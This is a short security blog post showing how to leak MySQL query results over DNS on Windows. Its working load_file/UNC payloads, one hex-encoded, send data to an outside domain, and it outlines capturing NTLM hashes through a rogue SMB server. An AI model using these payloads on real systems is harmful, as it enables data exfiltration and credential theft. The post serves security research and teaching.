My SQL Exfiltrating Data Over Out Of Band Channels(OOB)

Exfiltrating data over DNS is nowadays a very popular technique. This technique has been well documented for MS-SQL and Oracle databases. I figured out that it is also possible to do the same under Mysql Windows installation.

Here’s how:

select load_file(concat(‘\\\\foo.’,(select ‘test’),’.notsosecure.com\\’,’a.txt’));

This query will do a dns lookup for foo.test.notsosecure.com. You need FILE privileges to call load_file function. It is quite common to find mysql running as ‘root’ user under windows installation(in connection string).

You can also use the hex encoding to bypass the magic quote restriction:

mysql> select load_file(concat(0x5c5c5c5c732e,(select concat((select mid(version
(),1,12)),0x2e74657374)),
0x2e6e6f74736f7365637572652e636f6d5c5c,0x622e747874));

This resulted in the following DNS query:
05:20:36.349860 IP xxx.xxx.xxx.xxx.53298 > yyy.yyy.yyy.yyy.53: 17495 A? s.5.1.30-commu.test.notsosecure.com. (53)

The mysql version is 5.1.30-community

Now, mysql under windows runs as system(by default). If it was to run under any user account(e.g. administrator or a domian admin), then you can make it connect to your SMB server, send a pre calculated challenge(SMB challenge-response) and from the response obtained from the mysql server, you can then crack the NTLM session hash and thus obtain that user’s password.

I made a video demonstration of how to do it under ms-sql using xp_dirtree stored procedure, which i will post soon.

Enjoy..:)

2 Thoughts on “My SQL Exfiltrating Data Over Out Of Band Channels(OOB)

  1. very nice :) I remember playing with this before but I couldnt get it working at that time.

  2. kuza55 on March 4, 2009 at 11:59 am said:

    Do you know what preconditions need to be satisfied for the app to start sending NTLM credentials? I assume they have to be domain joined, but is there anything else? And do you know how IE has fixed this to stop internet sites from getting user hashes?

    Given windows file functionality interprets UNC paths natively, this seems like something that could be utilised to hack a whole lot of other software…

Leave a Reply

Your email address will not be published.

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

Post Navigation